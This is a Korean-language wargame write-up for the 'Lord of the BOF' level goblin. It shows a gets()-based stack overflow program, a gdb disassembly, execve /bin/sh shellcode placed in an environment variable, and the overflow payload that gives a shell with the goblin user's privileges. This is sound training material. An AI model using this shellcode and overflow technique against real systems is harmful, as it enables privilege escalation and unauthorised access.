[BOF] cobolt -> goblin

goblin 문제입니다.

[cobolt@localhost cobolt]$ cat goblin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - goblin

        - small buffer + stdin

*/

int main()

{

    char buffer[16];

    gets(buffer);

    printf("%s\n", buffer);

}

cobolt문제에서 gets함수만 추가되었습니다.

환경변수를 이용해서 쉘코드를 올리고 cat명령어를 이용해서 오버플로우를 합니다.

[cobolt@localhost cobolt]$ export SH=$(python -c 'print "\x90"*10000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\xb0\x0b\x89\xe1\x31\xd2\xcd\x80"')

(gdb) set disassembly-flavor intel 

(gdb) disassemble main

Dump of assembler code for function main:

0x80483f8 <main>: push   %ebp

0x80483f9 <main+1>: mov    %ebp,%esp

0x80483fb <main+3>: sub    %esp,16

0x80483fe <main+6>: lea    %eax,[%ebp-16]

0x8048401 <main+9>: push   %eax

0x8048402 <main+10>: call   0x804830c <gets>

0x8048407 <main+15>: add    %esp,4

0x804840a <main+18>: lea    %eax,[%ebp-16]

0x804840d <main+21>: push   %eax

0x804840e <main+22>: push   0x8048470

0x8048413 <main+27>: call   0x804833c <printf>

0x8048418 <main+32>: add    %esp,8

0x804841b <main+35>: leave  

0x804841c <main+36>: ret    

0x804841d <main+37>: nop    

0x804841e <main+38>: nop    

0x804841f <main+39>: nop    

End of assembler dump.

(gdb) b *0x804841b

Breakpoint 1 at 0x804841b

ret함수 전에 브레이크를 걸었습니다.

[cobolt@localhost cobolt]$ $(python -c 'print "\x90"*20+"\x76\xdc\xff\xbf"' ; cat)|./goblin

߿¿

bash$ id

uid=502(cobolt) gid=502(cobolt) euid=503(goblin) egid=503(goblin) groups=502(cobolt)

bash$ my-pass

euid = 503

hackers proof

bash$